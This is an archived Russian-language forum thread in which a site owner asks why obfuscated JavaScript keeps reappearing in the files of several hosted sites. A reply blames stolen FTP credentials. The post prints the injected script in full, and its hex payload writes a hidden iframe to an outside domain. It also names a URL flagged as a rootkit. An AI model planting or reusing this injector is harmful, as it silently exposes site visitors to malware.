PDA

Просмотр полной версии : Вирус на сайте!



Maverick_kirov
03.04.2008, 14:35
У меня есть 5 сайтов на phpnuke и есть сайты на сторонних самописных движках, сайты написаны разными фирмами и вероятность одних и тех же проблем в безопассности мала. Все сайты находятся на площадке одного хостера. В один "прекрасный" момент на всех этих сайтах в рhp и html файлах добавляется код:

<!-- o --><!-- Google Rank -->
<script type="text/javascript">
function A223D6ECCEA5D037F(ADC2C0E73A16B1AABF0D62){function A0457F0CDE4B445E4C93(){var AE22B794242AFB5DB9C921=16;return AE22B794242AFB5DB9C921;}return(parseInt(ADC2C0E73A 16B1AABF0D62,A0457F0CDE4B445E4C93()));}function AB98D796EDF77F198BF39354D566C3F5(FC1C45F6E91180A9A 9F1890465FAD2){function E5C106A6F70896F03(){var BD3CED2FCF2D13C9=2;return BD3CED2FCF2D13C9;}var B655F103BF55428477="";for(A0C7C7B6D01BCDBE64C8766017A33=0;A0C7C7B6D01BC DBE64C8766017A33<FC1C45F6E91180A9A9F1890465FAD2.length;A0C7C7B6D01B CDBE64C8766017A33+=E5C106A6F70896F03()){B655F103BF 55428477+=(String.fromCharCode(A223D6ECCEA5D037F(F C1C45F6E91180A9A9F1890465FAD2.substr(A0C7C7B6D01BC DBE64C8766017A33,E5C106A6F70896F03()))));}document .write(B655F103BF55428477);}AB98D796EDF77F198BF393 54D566C3F5("3C696672616D65207372633D687474703A2F2F676F6F676C65 2D746F702E696E2077696474683D31206865696768743D3120 7374796C653D22646973706C61793A6E6F6E65223E3C2F6966 72616D653E");
</script>
<!-- Google Rank --><!-- c -->

при просмотре этих сайтов nod32 пишет:
http//stroizona.info/db/a-1-231.dat вирус Win32/Rootkit.Agent.NEP троян

Не могу понять как этот вирус попал на сайт ? через дыру в защите безопассности сайта или через хостера.

Если удаляю весь вредоносный код с сайта, проходит день и сайт зарежен снова!

Помогите! что делать ? где искать ? кто-нибудь с этим сталкивался ?

Bratez
03.04.2008, 14:56
С большой вероятностью на вашем компьютере шпион, укравший пароль на фтп. Так что начать надо с логов по правилам:
http://virusinfo.info/showthread.php?t=1235